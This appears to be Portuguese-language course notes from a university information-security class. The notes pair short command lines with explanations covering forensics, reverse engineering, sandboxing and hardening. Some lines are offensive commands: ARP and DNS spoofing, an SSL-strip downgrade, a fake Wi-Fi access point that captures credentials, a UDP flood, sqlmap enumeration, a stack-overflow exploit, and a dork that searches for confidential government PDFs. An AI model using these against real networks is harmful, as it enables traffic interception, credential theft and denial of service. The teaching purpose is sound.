CÓDIGO DA DISCIPLINA: DEE345
Departamento de Engenharias e Exatas - UFPR/Palotina
Docente de Segurança da Informação
Anonimização protege a identidade em testes éticos e cadastros online, evitando rastreamento e spam.
sudo apt install proxychains-ng
# Configurar /etc/proxychains4.conf com proxy (ex.: socks5 127.0.0.1 9050)
proxychains4 nmap -sT 192.168.1.100
Explicação: Anonimiza varredura Nmap via proxy/TOR.
curl -s 'https://api.temp-mail.org/request/mail/id/XYZ'
Explicação: Obtém e-mails temporários via API para cadastros.
Exemplo: Acesse temp-sms.org, escolha número temporário e receba SMS para validação sem expor dados pessoais.
Explicação: Evita captura por bots de spam.
tor-browser --start
Explicação: Usa rede TOR para ocultar IP e localização.
Analisa software para entender sua lógica, identificar vulnerabilidades ou estudar malware.
strings -n 5 programa.bin | grep -i "password"
Explicação: Busca strings relacionadas a senhas em binários.
objdump -d programa.bin | less
Explicação: Mostra instruções assembly para análise.
analyzeHeadless projeto ghidra_proj -import programa.bin -scriptPath scripts/analyze.py
Explicação: Importa binário e executa script de análise automatizada.
gdb programa.bin
(gdb) break main
(gdb) run
(gdb) step
Explicação: Depura passo a passo, analisando fluxo do programa.
r2 programa.bin
[0x08048400]> aaa
[0x08048400]> pdf @ main
Explicação: Analisa binário e desassembla função main.
Exemplo: Código C ofuscado com nomes irrelevantes (ex.: x1yz
para variáveis).
Isola processos para análise segura de malware.
sudo apt install firejail
firejail --noprofile --net=none firefox
Explicação: Executa Firefox sem acesso à rede, isolando ameaças.
docker run -d -p 8000:8000 cuckoosandbox/cuckoo
cuckoo submit --file malware.exe
Explicação: Analisa comportamento de malware em VM.
docker run -d -p 22:22 remnux/remnux-distro
Explicação: Fornece ambiente pré-configurado com ferramentas como Ghidra e Volatility.
Restaura dados perdidos por exclusão, falhas ou ataques.
recuva.exe /path/to/drive
Explicação: Recupera arquivos deletados com pré-visualização.
sudo testdisk /dev/sda
# Selecionar: Analyse > Quick Search > Write
Explicação: Restaura tabelas de partição danificadas.
sudo photorec /dev/sda
# Selecionar disco e tipo de arquivo
Explicação: Recupera arquivos por assinatura, ignorando filesystem.
dd if=/dev/sda of=backup.img bs=4M conv=sync,noerror
Explicação: Preserva disco original para análise.
Ataques furtivos e prolongados, como Stuxnet. Mitigação com SIEM e EDR (ex.: Wazuh).
wazuh-agent --enroll 192.168.1.100
Explicação: Configura agente Wazuh para monitoramento de endpoints.
sudo arpspoof -i eth0 -t 192.168.1.100 192.168.1.1
Explicação: Envenena tabela ARP para interceptar tráfego.
sudo dnsspoof -i eth0 -f /etc/hosts.txt
Explicação: Redireciona consultas DNS para IPs maliciosos.
sudo bettercap --proxy-module sslstrip -I eth0
Explicação: Força downgrade de HTTPS para HTTP.
sudo airbase-ng -e "WiFiFalsa" -c 6 wlan0mon
Explicação: Cria AP falso para capturar credenciais.
echo "Header always set Strict-Transport-Security 'max-age=31536000'" >> /etc/nginx/nginx.conf
Explicação: Ativa HSTS para forçar HTTPS.
Detecção com IA e ferramentas específicas.
deepware scan video.mp4
Explicação: Analisa vídeos para identificar manipulações por IA.
Exemplo: Log4J (CVE-2021-44228).
nmap --script log4j-detect 192.168.1.0/24
Explicação: Varre sub-rede por vulnerabilidades Log4J.
hping3 --udp --flood -c 10000 192.168.1.100
Explicação: Sobrecarrega alvo com pacotes UDP.
iptables -A INPUT -p udp --dport 80 -m limit --limit 25/second -j ACCEPT
Explicação: Limita tráfego UDP para mitigar flood.
#include
int main() {
char buf[10];
gets(buf); // Vulnerável
printf("Input: %s\n", buf);
return 0;
}
# Compilar sem proteções
gcc -fno-stack-protect -z execstack vuln.c -o vuln
# Exploit exemplo
echo "AAAABBBB\xef\xbe\xad\xde" | ./vuln
Explicação: Sobrescreve retorno da função para endereço malicioso.
dnsspoof -i eth0 -f /etc/hosts.txt
Explicação: Corrompe cache DNS para redirecionar tráfego.
Mitigação: Habilitar DNSSEC.
echo "dnssec-enable yes" >> /etc/bind/named.conf.options
sqlmap -u "http://alvo.com?id=1" --dbs
Explicação: Enumera bancos de dados via injeção SQL.
# XSS Armazenado
# Mitigação com CSP
echo "Content-Security-Policy: script-src 'self'" >> /etc/nginx/nginx.conf
Explicação: CSP restringe execução de scripts não autorizados.
Protege Docker, Kubernetes e runtime contra ameaças.
docker run --net host --pid host --userns host --cap-add audit_control \
-v /var/lib:/var/lib docker/docker-bench-security
Explicação: Verifica configurações inseguras em Docker.
kubectl apply -f https://raw.githubusercontent.com/aquasecurity/kube-bench/main/job.yaml
Explicação: Avalia conformidade com CIS Benchmarks.
docker run -d --privileged falcosecurity/falco
Explicação: Detecta comportamentos anormais em contêineres.
sysdig -c spy_users
Explicação: Monitora atividades de usuários em contêineres.
docker run --user 1000 -v /data:/data:ro vuln/web-dvwa
Explicação: Executa contêiner como usuário não-root com volume read-only.
sha256sum imagem.dd > imagem.sha256
echo "Imagem coletada por Ana em 2025-06-11" >> chain_of_custody.txt
lsblk
Explicação: Lista dispositivos para identificar disco alvo.
sudo mount -o ro /dev/sda1 /mnt/evidence
Explicação: Evita alterações no disco.
dd if=/dev/sda of=imagem.dd bs=4M conv=sync,noerror
sha256sum imagem.dd > imagem.sha256
Explicação: Gera imagem do disco e valida integridade.
autopsy -i imagem.dd
Explicação: Analisa imagem de disco para recuperar arquivos.
wireshark captura.pcap
Explicação: Examina pacotes para detectar MITM.
volatility -f memdump.raw --profile=LinuxUbuntu18_04x64 pslist
Explicação: Lista processos ativos na memória.
deepware scan audio.wav
Explicação: Detecta manipulações em áudio.
logger -p local0.info "Teste de conformidade com Marco Civil"
Explicação: Gera log para auditoria legal.
Exemplo: Coleta forense requer ordem judicial para dados pessoais.
docker run -d -p 22:22 remnux/remnux-distro
Explicação: Implanta REMnux para análise de malware.
openvpn --config htb.ovpn
Explicação: Conecta ao HackTheBox para desafios práticos.
Exemplo: Busca Google Hacking: site:*.gov.br filetype:pdf confidential
.
Exemplo: OSCP foca em pentest prático, ideal para iniciantes.
Exemplo: Seguir @gabrielpato no X para dicas de cibersegurança.
Visualização de ameaças detectadas por tipo:
temp-mail.org
fornece e-mails temporários e descartáveis.
temp-mail.org
, não domínios comuns como gmail ou yahoo.
Ghidra
é uma suíte de engenharia reversa gratuita desenvolvida pela NSA.
TestDisk
é utilizado para recuperar partições perdidas e reparar tabelas de partição.
Volatility
é usado para análise de memória RAM em forense.